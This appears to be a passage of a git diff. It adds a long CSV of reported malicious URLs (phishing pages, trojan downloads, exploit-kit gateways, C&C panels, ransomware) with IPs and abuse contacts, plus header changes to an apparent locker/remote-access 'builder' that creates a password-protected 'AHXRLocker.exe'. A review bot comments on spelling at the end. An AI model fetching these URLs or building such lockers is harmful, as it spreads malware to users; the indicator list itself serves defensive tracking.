Fayaz / jktdc@aford.net","32613","0","CA", +"2016/01/27_11:21","wonchangvacuum.com.my/libraries/pear/mandate.htm","103.6.196.156","datousaurus.mschosting.com.","Phishing","-","46015","0","MY", +"2016/01/27_11:21","gosciniec-paproc.pl/lib/excel/kamp.php","85.128.248.56","aon56.rev.netart.pl.","Phishing","kontakt@nazwa.pl","15967","0","PL", +"2016/01/29_07:39","deleondeos.com/img/script.php?tup1.jpg","95.105.27.11","95.105.27.11.dynamic.oktgs.ufanet.ru.","trojan","Registrar Abuse Contact Email:compliance_abuse@webnic.cc","24955","0","RU", +"2016/01/29_07:39","deleondeos.com/img/script.php?tup2.jpg","176.106.31.227","-","trojan","Registrar Abuse Contact Email:compliance_abuse@webnic.cc","52043","0","RU", +"2016/01/29_07:39","deleondeos.com/img/script.php?tup3.jpg","176.104.18.152","s-176-104-18-152.under.net.ua.","trojan","Registrar Abuse Contact Email:compliance_abuse@webnic.cc","41435","0","UA", +"2016/02/01_13:14","www.pieiron.co.uk/","146.185.29.100","www6.grakka.net.","iframe on compromised site leads to EK","Grakka Limited / -","29302","0","GB", +"2016/02/29_07:14","www.icybrand.eu/pathway/created/accelerated/mailuserlg/savealife/trwrwbejtw.zip","192.185.194.21","ns387.websitewelcome.com.","Phishing","NOT DISCLOSED! / -","20013","0","US", +"2016/02/29_07:14","www.icybrand.eu/pathway/created/accelerated/mailuserlg/savealife/trwrwbejtw/viewer.php","192.185.194.21","ns387.websitewelcome.com.","Phishing","NOT DISCLOSED! 
/ -","20013","0","US", +"2016/02/29_13:00","www.gold-city.it/image/_vti_cnf/app/psi.exe","31.11.33.82","websn2s072.aruba.it.","trojan","-","31034","0","IT", +"2016/02/29_13:00","www.cerquasas.it/wp-admin/user/UPS_INVOICE.rar","109.168.123.112","srv-hs2-112.netsons.net.","trojan","-","5602","0","IT", +"2016/02/29_13:00","-","91.224.161.116/ftz/z64.bin","-","malware calls home","-","50673","0","NL", +"2016/02/29_13:00","-","91.224.161.116/ftz/z32.bin","-","malware calls home","-","50673","0","NL", +"2016/03/01_07:20","-","188.138.68.160/sdt/skodls/dp.exe","static-ip-188-138-68-160.inaddr.ip-pool.com.","trojan","-","8972","0","DE", +"2016/03/03_10:17","www.inevo.co.il/","212.199.114.168","mx.standingdesk.co.il.","iframe on compromised site leads to EK","-","9116","0","IL", +"2016/03/04_13:55","nevergreen.net/6ob","107.180.26.77","ip-107-180-26-77.ip.secureserver.net.","Bot","-","26496","0","US", +"2016/03/08_10:51","izzy-cars.nl/9uj8n76b5.exe","46.235.47.134","srv047134.webreus.nl.","trojan","-","34233","0","NL", +"2016/03/08_10:58","stopmeagency.free.fr/9uj8n76b5.exe","212.27.63.112","perso112-g5.free.fr.","trojan","skolaric@online.net","12322","0","FR", +"2016/03/08_10:58","reclamus.com/9uj8n76b5.exe","198.63.208.35","vserv.cifnet.com.","trojan","-","14585","0","US", +"2016/03/08_10:58","lhs-mhs.org/9uj8n76b5.exe","208.131.141.2","rageresearch.com.","trojan","Gene Mathis / gcm@gcmathis.com","29854","0","US", +"2016/03/13_14:23","-","81.169.219.64/security_check.html","h2543039.stratoserver.net.","PayPal phishing","-","6724","0","DE", +"2016/03/13_14:23","-","185.11.146.198/","nginx1.vosuites.cl.","PayPal phishing","-","49349","0","NL", +"2016/03/15_07:55","www.schuh-zentgraf.de/","81.169.145.160","wa0.rzone.de.","iframe on compromised site leads to EK","hostmaster@strato.de","6724","0","DE", +"2016/03/15_11:48","legendsdtv.com/lmzjH7XQY/","67.212.178.106","m2304.sgded.com.","leads to CryptoLocker","Registrar Abuse Contact domainabuse@tucows.com","32475","0","US", 
+"2016/03/18_06:58","zt.tim-taxi.com/login.php","198.12.67.179","179.67.12.198.host.nwnx.net.","MasterCard phishing","Registrar Abuse Contact onlinenic-enduser@onlinenic.com","36352","0","US", +"2016/03/18_09:37","-","104.245.239.7/~earlysym/vr.php","infra23.imacomsolucoes.com.br.","WellsFargo phishing destination","-","62638","0","US", +"2016/03/18_14:13","marialorena.com.br/wp-content/plugins/hello123/8888ytc6r.exe","200.219.253.23","23.0-127.253.219.200.in-addr.arpa.","trojan","Andre Luiz Bili / bili@ionconsultoria.com.br","16397","0","BR", +"2016/03/29_20:56","holishit.in/wp-content/plugins/wpclef/assets/src/sass/neat/grid/binarystings.php","160.153.63.4","ip-160-153-63-4.ip.secureserver.net.","Teslacrypt c&c","Ankit Luthra / luthra.ankit@gmail.com","26496","0","US", +"2016/03/29_20:56","grosirkecantikan.com/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/binarystings.php","192.185.51.87","-","Teslacrypt c&c","Registrant 7C066F9203AB46FC9331AF2FCDB5DD5E.PROTECT@WHOISGUARD.COM","20013","0","US", +"2016/03/31_10:01","kassabravo.com/","67.196.85.119","israsky.com.","iframe on compromised site leads to EK","Registrant ELI72@013.NET","8001","0","US", +"2016/03/31_13:34","www.actiagroup.com/","141.0.187.5","-","iframe on compromised site leads to EK","Registrar Abuse Contact abuse@support.gandi.net","30741","0","FR", +"2016/06/28_20:52","www.alphamedical02.fr/","94.23.236.74","ns308230.ip-94-23-236.eu.","iframe on compromised site leads to EK","stephane.louis@impaakt.fr","16276","0","FR", +"2016/04/28_07:49","www.dezuiderwaard.nl/","195.238.74.87","www53.totaalholding.nl.","iframe on compromised site leads to EK","-","50673","0","NL", +"2016/04/28_12:00","kollagen4you.se/","46.252.206.1","n1nlhg198c1198.shr.prod.ams1.secureserver.net.","iframe on compromised site leads to EK","-","26496","0","NL", +"2016/04/28_14:52","www.del-marine.com/","80.244.187.39","mail.ebnserver1.com.","iframe on compromised site leads to EK","Registrar Abuse 
Contact domainabuse@tucows.com","34934","0","GB", +"2016/05/02_10:23","www.donneuropa.it/","23.23.85.3","ec2-23-23-85-3.compute-1.amazonaws.com.","iframe on compromised site leads to EK","-","14618","0","US", +"2016/05/05_18:09","www.roltek.com.tr/","94.73.151.5","94-73-151-5.cizgi.net.tr.","iframe on compromised site leads to EK","-","34619","0","TR", +"2016/05/10_07:18","www.outlinearray.com/","85.235.130.71","w461.widhost.net.","iframe on compromised site leads to EK","Registrar Abuse Contact domainabuse@tucows.com","31034","0","IT", +"2016/05/12_08:36","www.airsonett.se","193.44.13.93","193-44-13-93.net.tnm.se.","iframe on compromised site leads to EK","-","3301","0","SE", +"2016/05/12_14:22","www.autoappassionati.it/","109.233.126.14","cpanel01.infinitynet.it.","iframe on compromised site leads EK","-","48815","0","IT", +"2016/05/23_09:06","www.sieltre.it/","79.58.246.237","host237-246-static.58-79-b.business.telecomitalia.it.","iframe on compromised site leads to EK","-","3269","0","IT", +"2016/05/24_17:36","www.ceisystems.it/","178.212.142.108","ceisystems.it.","iframe on compromised site leads to EK","-","47316","0","IT", +"2016/05/30_11:34","www.northpoleitalia.it/","46.37.11.7","host7-11-37-46.serverdedicati.aruba.it.","iframe on compromised site leads to EK","-","","0","", +"2016/05/30_16:31","buildviet.info/servicer/fattura/","123.30.240.66","static.vdc.vn.","redirects to trojan download at SugarSync","VDC Online / domain@vdc.com.vn","45899","0","VN", +"2016/06/06_10:17","welington.info/","187.17.111.101","-","iframe on compromised site leads to EK","Welington dos Santos Silva / welington.silva@hotmail.com.br","7162","0","BR", +"2016/06/07_08:37","www.vertourmer.com/","81.31.147.91","jmhlmd41.colt-engine.it.","iframe on compromised site leads to EK","Registrar Abuse Contact domainabuse@tucows.com","47242","0","IT", +"2016/06/16_12:43","jeanlesigne.com/wp-content/file.exe","46.4.100.162","server18.hosting010.nl.","Trojan.Backdoor","Registrant 
760130F961CC42B39A919079849FA4A5.PROTECT@WHOISGUARD.COM","24940","0","DE", +"2016/06/17_12:10","www.nuvon.com/","64.207.96.72","-","iframe on compromised site leads to EK","-","11598","0","US", +"2016/06/17_12:10","ex.technor.com/index.php","82.113.193.43","web.alias.twt.it.","iframe on compromised site leads to EK","Registrar Abuse Contact abuse-registrar@orange-business.com","30848","0","IT", +"2016/07/08_16:15","cosmos.felago.es/gsvot2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/06/20_14:33","www.salentoeasy.it/","95.110.189.62","host62-189-110-95.serverdedicati.aruba.it.","iframe on compromised site leads to EK","-","31034","0","IT", +"2016/06/21_10:21","www.fsm-europe.eu/","79.96.162.106","cloudserver092054.home.net.pl.","iframe on compromised site leads to EK","NOT DISCLOSED! / -","12824","0","PL", +"2016/06/24_12:43","www.fiocchidiriso.com/","81.31.147.98","jmhlmd43.colt-engine.it.","iframe on compromised site leads to EK","Registrar Abuse Contact domainabuse@tucows.com","47242","0","IT", +"2016/06/23_15:01","www.enchantier.com/","176.31.73.196","www.enchantier.com.","iframe on compromised site leads to EK","Registrar Abuse Contact abuse@1and1.com","16276","0","FR", +"2016/06/27_08:07","www.gennaroespositomilano.it/","75.126.217.36","web234.webfaction.com.","iframe on compromised site leads to EK","-","36351","0","US", +"2016/06/27_12:33","www.airbornehydrography.com/","194.9.95.65","s210.loopia.se.","iframe on compromised site leads to EK","Registrar Abuse Contact abuse@ascio.com","39570","0","SE", +"2016/06/29_08:48","websitebuildersinfo.in","166.62.28.83","ip-166-62-28-83.ip.secureserver.net.","fake infection page","robert hawkins / robertkins1@outlook.com","26496","0","US", +"2016/07/07_10:05","scream.garudamp3.com/arais2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrant PAOLO@KIMCIL.WS","49981","0","NL", 
+"2016/07/07_12:15","exclaim.goldenteamacademy.cl/arais2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/07_13:30","shoal.grahanusareadymix.com/arais2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact domainabuse@tucows.com","49981","0","NL", +"2016/07/08_11:20","concede.fmtlib.net/khoklj2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","moniker.com billing department / tech@moniker.com","49981","0","NL", +"2016/07/08_14:05","boots.fotopyra.pl/gsvot2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","kontakt@nazwa.pl","49981","0","NL", +"2016/07/08_15:45","drank.fa779.com/gsvot2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrant tmm121212@163.com","49981","0","NL", +"2016/07/08_16:50","milf.gabriola.cl/gsvot2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/08_16:55","cosmos.furnipict.com/gsvot2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact domainabuse@tucows.com","49981","0","NL", +"2016/07/12_13:19","www.ywvcomputerprocess.info/errorreport/ty5ug6h4ndma4/","103.224.212.222","lb-212-222.above.com.","fake alert page","ywvcomputerprocess.info@domainsbyproxy.com","133618","0","AU", +"2016/10/13_14:03","www.family-partners.fr/data.dpg","95.142.169.132","xvm-169-132.ghst.net.","ransomware","noc@gandi.net","29169","0","FR", +"2016/07/13_11:10","trifle.ernstenco.be/ajuijm2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Not shown, please visit www.dnsbelgium.be for webbased whois. 
/ administrator@mijnhostingpartner.nl","49981","0","NL", +"2016/07/13_12:10","vomit.facilitandosonhos.com.br/ajuijm2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Mariana Helena Queiroz Santos / marianahqs@gmail.com","49981","0","NL", +"2016/07/13_12:15","stork.escortfinder.cl/ajuijm2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/13_12:45","erupt.fernetmoretti.com.ar/ajuijm2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/13_12:50","invention.festinolente.cl/ajuijm2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/13_16:30","crops.dunight.eu/uzjuz2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","NOT DISCLOSED! / -","49981","0","NL", +"2016/07/13_17:05","higher.dwebsi.tk/uzjuz2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","E-mail: abuse: abuse@freenom.com, copyright infringement: copyright@freenom.com","49981","0","NL", +"2016/07/13_18:15","headless.ebkfwd.com/uzjuz2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact domainabuse@tucows.com","49981","0","NL", +"2016/07/13_18:20","above.e-rezerwacje24.pl/uzjuz2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","bok@domena.pl","49981","0","NL", +"2016/07/14_13:10","personal.editura-amsibiu.ro/rdxzmt2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/14_14:15","likes.gisnetwork.net/ysfmgl2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact domainabuse@tucows.com","49981","0","NL", +"2016/07/14_14:20","terem.eltransbt.ro/ysfmgl2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/14_15:30","pacman.gkgar.com/omrjy2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrant 
tekinabay4@hotmail.com","49981","0","NL", +"2016/07/14_15:35","pacan.gofreedom.info/omrjy2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Go Freedom Info / gofreedom@protonmail.ch","49981","0","NL", +"2016/07/14_17:25","absurdity.flarelight.com/xdnkn2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact domains@crazydomains.com","49981","0","NL", +"2016/07/18_13:10","aircraft.evote.cl/ybluq2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/18_15:30","produla.czatgg.pl/rxdjna2.html","93.190.140.118","customer.worldstream.nl.","gateway to EK","bok@biznes-host.pl","49981","0","NL", +"2016/07/18_16:40","vdula.czystykod.pl/rxdjna2.html","93.190.140.118","customer.worldstream.nl.","gateway to EK","domeny@ConsultingService.pl","49981","0","NL", +"2016/07/18_17:15","stock.daydreamfuze.com/rxdjna2.html","93.190.140.118","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/18_17:31","www.luce.polimi.it/it/","131.175.187.208","web193.asict.polimi.it.","iframe on compromised site leads to EK","-","137","0","IT", +"2016/07/18_18:30","soros.departamentosejecutivos.cl/venak2.html","93.190.140.118","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/20_14:05","smilll.depozit.hr/bgaldb2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/20_15:15","spread.diadanoivabh.com.br/alvbh2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","Bernardo Barreto Cyrillo / bernardobcy@gmail.com","49981","0","NL", +"2016/07/20_16:25","pave.elisecries.com/zbtqvc2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/20_16:30","plank.duplicolor.cl/zbtqvc2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/20_17:35","lay.elticket.com.ar/tslwo2.html","93.190.140.121","customer.worldstream.nl.","gateway 
to EK","-","49981","0","NL", +"2016/07/21_12:15","borat.elticket.com.ar/pkge2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/21_13:20","adv.riza.it/www/delivery/ajs.php?zoneid=51&cb=96020978060","62.149.195.107","host107-195-149-62.serverdedicati.aruba.it.","iframe on compromised site leads to exploit kit","-","31034","0","IT", +"2016/07/21_14:40","peeg.fronterarq.cl/odbsx2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/21_14:45","hmora.fred-build.tk/odbsx2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","E-mail: abuse: abuse@freenom.com, copyright infringement: copyright@freenom.com","49981","0","NL", +"2016/07/21_15:20","molla.gato1000.cl/edmiu2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/21_16:30","victor.connectcloud.ch/nukgfr2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/21_16:35","lexu.goggendorf.at/nukgfr2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/09_12:36","avokka.com/Panel/dl.exe","67.212.91.221","beach.sibername.com.","Trojan.Backdoor","Registrant contact@privacyprotect.org","10929","0","CA", +"2016/08/09_12:36","avokka.com/Panel/gate.php","67.212.91.221","beach.sibername.com.","Trojan.C&C","Registrant contact@privacyprotect.org","10929","0","CA", +"2016/08/09_20:02","www.jcmarcadolib.com/hbc/a.php","82.221.129.16","esja.orangewebsite.com.","phishing","Registrar Abuse Contact abuse@internet.bs","50613","0","IS", +"2016/08/12_07:01","euro-vertrieb.com/hosteurope/KIS-Login.htm","217.31.81.101","zaphod3-1.hostweb.de.","Hosteurope phishing","Registrar Abuse Contact abuse@corehub.net","29140","0","DE", +"2016/08/13_10:47","coffeol.com/fend/raw_server.exe","208.112.30.120","-","Trojan.Backdoor","-","20021","0","US", 
+"2016/08/13_10:47","www.pgathailand.com/which.exe","128.199.127.7","pyptech.net.","Trojan.P0ny","-","133165","0","GB", +"2016/08/22_16:35","scanty.colormark.cl/rjavgx3.html","93.190.140.163","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/22_18:45","decorator.crabgrab.cl/rjavgx3.html","93.190.140.163","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/23_17:30","pumpkin.brisik.net/rvgkm3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact abuse@melbourneit.com.au","49981","0","NL", +"2016/08/23_18:40","losos.caliane.com.br/wkicrz3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","Newton Arigony da Silva Neto / newtondf@gmail.com","49981","0","NL", +"2016/08/23_18:45","losas.cabanaslanina.com.ar/wkicrz3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_10:10","wopper.bioblitzgaming.ca/pwigd3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_10:45","mepra.blautechnology.cl/pwigd3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_11:55","wixx.caliptopis.cl/lwwxx3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_12:00","funkucck.bluerobot.cl/lwwxx3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_12:35","soxorok.ddospower.ro/lwwxx3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_15:05","pybul.bestfrozenporn.nl/jvoxyj3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_15:40","bonjo.bmbsklep.pl/jvoxyj3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","domeny@ConsultingService.pl","49981","0","NL", 
+"2016/08/26_16:55","womsy.bobbutcher.net/rtuee3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_17:35","gojnox.boxtomarket.com/yxmvr3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","Registrant VENTAS@CAMINOWEB.COM","49981","0","NL", +"2016/08/29_12:35","honor.agitaattori.fi/rncbu3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/29_13:10","geil.alon3.tk/rncbu3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","E-mail: abuse: abuse@freenom.com, copyright infringement: copyright@freenom.com","49981","0","NL", +"2016/08/29_13:15","vitaly.agricolacolhue.cl/rncbu3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/29_14:25","unlink.altitude.lv/vdgqb3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","siaaltitude@gmail.com","49981","0","NL", +"2016/08/29_15:40","cqji.artidentalkurs.com/vdgqb3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/30_12:20","rufex.ajfingenieros.cl/dsgajo3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/30_12:25","wuvac.agwebdigital.com/dsgajo3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","Registrant WK356W35HL64VDK@PROXY.DREAMHOST.COM","49981","0","NL", +"2016/09/01_11:55","tanner.alicerosenmanmemorial.com/hggfgl3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/09/01_14:55","sanya.vipc2f.com/ceqxwu3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact abuse@namesilo.com","49981","0","NL", +"2016/09/01_16:55","livre.wasastation.fi/ceqxwu3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/09/01_17:00","pogruz.wanyizhao.net/ceqxwu3.html","93.190.140.162","customer.worldstream.nl.","gateway to 
EK","Registrant wangsongd@gmail.com","49981","0","NL", +"2016/09/01_17:35","tahit.wastech2016.in/xcqrsw3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","Chirag Bhimani / chirag@bhimani.in","49981","0","NL", +"2016/09/05_09:37","ad.9tv.co.il/serv4/www/delivery/ajs.php?zoneid=37&cb=54350405237&charset=utf-8","62.219.67.44","bzq-67-44.red.bezeqint.net.","iframe on compromised site leads to exploit kit","-","8551","0","IL", +"2016/09/05_09:37","giants.yourzip.co/static/quotes.js?ver=d58072be2820e8682c0a27c0518e805e","5.200.55.58","-","leads to exploit kit","David Atherton / automotiveace@gmail.com","48096","0","RU", +"2016/09/05_09:37","evans.babajilab.in/specimen/1479491/tire-something-detect-five-what-knot-unknown-entertain-stiff","85.143.219.181","60567.simplecloud.club.","exploit kit","Zimong Software Private Limited Zimong Software Private Limited / info@zimong.com","201848","0","RU", +"2016/09/05_10:07","ross.starvingmillionaire.org/unveiled/dropdown.js?ver=496e05e1aea0a9c4655800e8a7b9ea28","5.200.55.58","-","leads to exploit kit","Keith Weaver / keith@keithlweaver.com","48096","0","RU", +"2016/09/06_11:49","structured.blackswanstore.com/plc/header.js","5.200.55.91","-","leads to exploit kit","-","48096","0","RU", +"2016/09/06_12:42","jessisjewels.com/disk/update/postmaster/en/?ar=yourname@yourdomain.com","50.87.153.96","50-87-153-96.unifiedlayer.com.","phishing site","-","46606","0","US", +"2016/09/15_08:48","tscl.com.bd/m/RI%20XIN%20QUOTATION%20LIST.zip","209.99.16.206","206.0/24.16.99.209.in-addr.arpa.","trojan inside zip file","-","394695","0","US", +"2016/09/15_10:06","catjogger.win/ganel/gate.php","213.145.225.170","web02.chillydomains.com.","pony loader c&c","-","25575","0","AT", +"2016/09/21_12:12","apexgames.org/ykxj6/par/factura.zip","166.62.112.150","ip-166-62-112-150.ip.secureserver.net.","Javascript inside zip file leads to trojan","APEXGAMES.ORG@domainsbyproxy.com","26496","0","US", 
+"2016/09/21_12:12","art-archiv.ru/images/animated-number/docum-arhiv.exe","81.177.139.111","-","trojan","-","8342","0","RU", +"2016/10/13_14:03","elmissouri.fr/data.dpg","213.186.33.50","cluster017.ovh.net.","ransomware","tech@ovh.net","16276","0","FR", +"2016/10/30_01:52","kingskillz.ru/~kingskil/Prince/Man/lucy/mine/shit.exe","85.143.215.183","62695.simplecloud.club.","Trojan.FareIt","-","201848","0","RU", +"2017/01/19_13:05","61kx.uk-insolvencydirect.com/sending_data/in_cgi/bbwp/cases/Inquiry.php","35.166.113.223","ec2-35-166-113-223.us-west-2.compute.amazonaws.com.","leads to ransomware","Registrar Abuse Contact abuse@namesilo.com","16509","0","US", +"2017/01/19_13:05","daralasnan.com/wp-content/plugins/mkazaqbya/vmywyvz4.php","166.62.12.1","sg2nlhg800c1800.shr.prod.sin2.secureserver.net.","leads to ransomware","-","26496","0","US", +"2017/01/19_13:05","www.studiolegaleabbruzzese.com/wp-content/plugins/urxwhbnw3ez/flight_4832.pdf","62.149.142.206","webx440.aruba.it.","ransomware","Registrar Abuse Contact domainabuse@tucows.com","31034","0","IT", +"2017/01/19_13:05","raneevahijab.id/adnin/box/workspace/","103.24.13.91","server3.e-cbncloud.co.id.","phishing site","-","132644","0","ID", +"2017/01/25_20:15","www.lifelabs.vn/api/get.php?id=aW5mb0BzYXBjdXBncmFkZXMuY29t","118.69.196.199","-","Trojan.Backdoor, Office.Word.Downloader","-","18403","0","VN", +"2017/01/25_20:16","falconsafe.com.sg/api/get.php?id=aW5mb0BzYXBjdXBncmFkZXMuY29t","43.229.84.107","-","Trojan.Backdoor, Office.Word.Downloader","domain@exabytes.sg","38532","0","SG", +"2017/02/09_14:04","fo5.a1-downloader.org/g2v9s1.php?id=yourname@yourdomain.com","188.225.32.177","vds-tibca.timeweb.ru.","trojan download","Protection of Private Person / a1-downloader.org@regprivate.ru","9123","0","RU", +"2017/03/06_21:09","www.hjaoopoa.top/admin.php?f=1.gif","52.207.234.89","ec2-52-207-234-89.compute-1.amazonaws.com.","Cerber ransomware","Registrant lecborbobl@rothtec.com","14618","0","US", 
+"2017/03/06_21:09","up.mykings.pw:8888/update.txt","60.250.76.52","60-250-76-52.HINET-IP.hinet.net.","related to a Mirai windows spreader trojan","Registrant 30da1310f05f42d7a349460c551aee6f.protect@whoisguard.com","3462","0","TW", +"2017/03/06_21:09","down.mykings.pw:8888/ver.txt","60.250.76.52","60-250-76-52.HINET-IP.hinet.net.","related to a Mirai windows spreader trojan","Registrant 30da1310f05f42d7a349460c551aee6f.protect@whoisguard.com","3462","0","TW", +"2017/03/06_21:09","down.mykings.pw:8888/ups.rar","60.250.76.52","60-250-76-52.HINET-IP.hinet.net.","related to a Mirai windows spreader trojan","Registrant 30da1310f05f42d7a349460c551aee6f.protect@whoisguard.com","3462","0","TW", +"2017/03/14_23:02","ssl-6582datamanager.de/","54.72.9.51","ec2-54-72-9-51.eu-west-1.compute.amazonaws.com.","redirects to Paypal phishing","goldanderwand@aol.com","16509","0","US", +"2017/03/14_23:02","privatkunden.datapipe9271.com/","104.31.75.147","-","Paypal phishing","Registrar Abuse Contact abuse@namecheap.com","13335","0","US", +"2017/03/20_10:13","alegroup.info/ntnrrhst","194.87.217.87","mccfortwayne.org.","Ransom, Fake.PCN, Malspam","Lee Everton / lee_everton2002@yahoo.com","197695","0","RU", +"2017/03/20_10:13","fourthgate.org/Yryzvt","104.200.67.194","-","Ransom, Fake.PCN, Malspam","Charlie Dillon / godaddy@638united.com","8100","0","US", +"2017/03/20_10:13","dieutribenhkhop.com/parking/","84.200.4.125","125.0-255.4.200.84.in-addr.arpa.","Ransom, Fake.PCN, Malspam","-","31400","0","DE", +"2017/03/20_10:13","dieutribenhkhop.com/parking/pay/rd.php?id=10","84.200.4.125","125.0-255.4.200.84.in-addr.arpa.","Ransom, Fake.PCN, Malspam","-","31400","0","DE", +"2017/05/01_16:22","amazon-sicherheit.kunden-ueberpruefung.xyz","185.61.138.74","hosted-by.blazingfast.io.","phishing","-","49349","0","UA", +"2017/06/02_08:38","sarahdaniella.com/swift/SWIFT%20$.pdf.ace","63.247.140.224","coriandertest.hmdnsgroup.com.","trojan","Registrar Abuse Contact abuse@gkg.net","19271","0","US", 
+"2017/09/28_08:11","izeselet.hu/wp-content/uploads/2016/03/ch.js","87.229.63.171","s3.abplusz.hu.","coin mining","-","62292","0","HU", +"2017/10/26_13:48","photoscape.ch/Setup.exe","31.148.219.11","knigazdorovya.com.","trojan","-","14576","0","CZ", + diff --git a/_build/shutdownscan.exe b/_build/shutdownscan.exe new file mode 100644 index 0000000..5caddcb Binary files /dev/null and b/_build/shutdownscan.exe differ diff --git a/src/builder/build.h b/src/builder/build.h index 5b67d5f..834220e 100644 --- a/src/builder/build.h +++ b/src/builder/build.h @@ -23,8 +23,9 @@ extern void validateClientBuild(System::String ^ message, System::String ^ password, System::Windows::Forms::SaveFileDialog ^ saveref, bool showDialog=true); extern void createClientLocker(System::String ^ fileName, System::String ^ password, System::String ^ message, System::String ^ exe, System::String ^ address, bool exith=true); -#define ERROR_MSG_1 "Illegal Characters" -#define ERROR_MSG_2 "Please enter a message." -#define ERROR_MSG_3 "Please enter a password." -#define WARNING_MSG "Warning: Unauthorized remote access to another computer is considered illegal in most cases. By toggling this on, you agree and take full responsbility for your actions." -#define COMPLETE_MSG "Done." \ No newline at end of file +#define ERROR_MSG_1 "Illegal Characters" +#define ERROR_MSG_2 "Please enter a message." +#define ERROR_MSG_3 "Please enter a password." +#define WARNING_MSG "Warning: Unauthorized remote access to another computer is considered illegal in most cases. By toggling this on, you agree and take full responsbility for your actions." +#define COMPLETE_MSG "Done." +#define LOCKER_FILE_PATH "AHXRLocker.exe" \ No newline at end of file diff --git a/src/builder/frmMain.h b/src/builder/frmMain.h index 548f2b7..25f57ce 100644 --- a/src/builder/frmMain.h +++ b/src/builder/frmMain.h 
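Review bot: In src/builder/build.h the `WARNING_MSG` line is rewritten by this hunk but keeps the misspelling "responsbility" in a string that is presumably shown to the user; since the line is touched anyway, correct it to `responsibility`. The new `LOCKER_FILE_PATH` is a bare file name with no comment, so a reader cannot tell which directory `AHXRLocker.exe` is expected in when main.cpp passes it to `setLockerFileName`. A one-line comment above the define stating that would help, e.g. `// Locker template file name; resolved relative to <directory — confirm>`. The header also still ends without a trailing newline.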
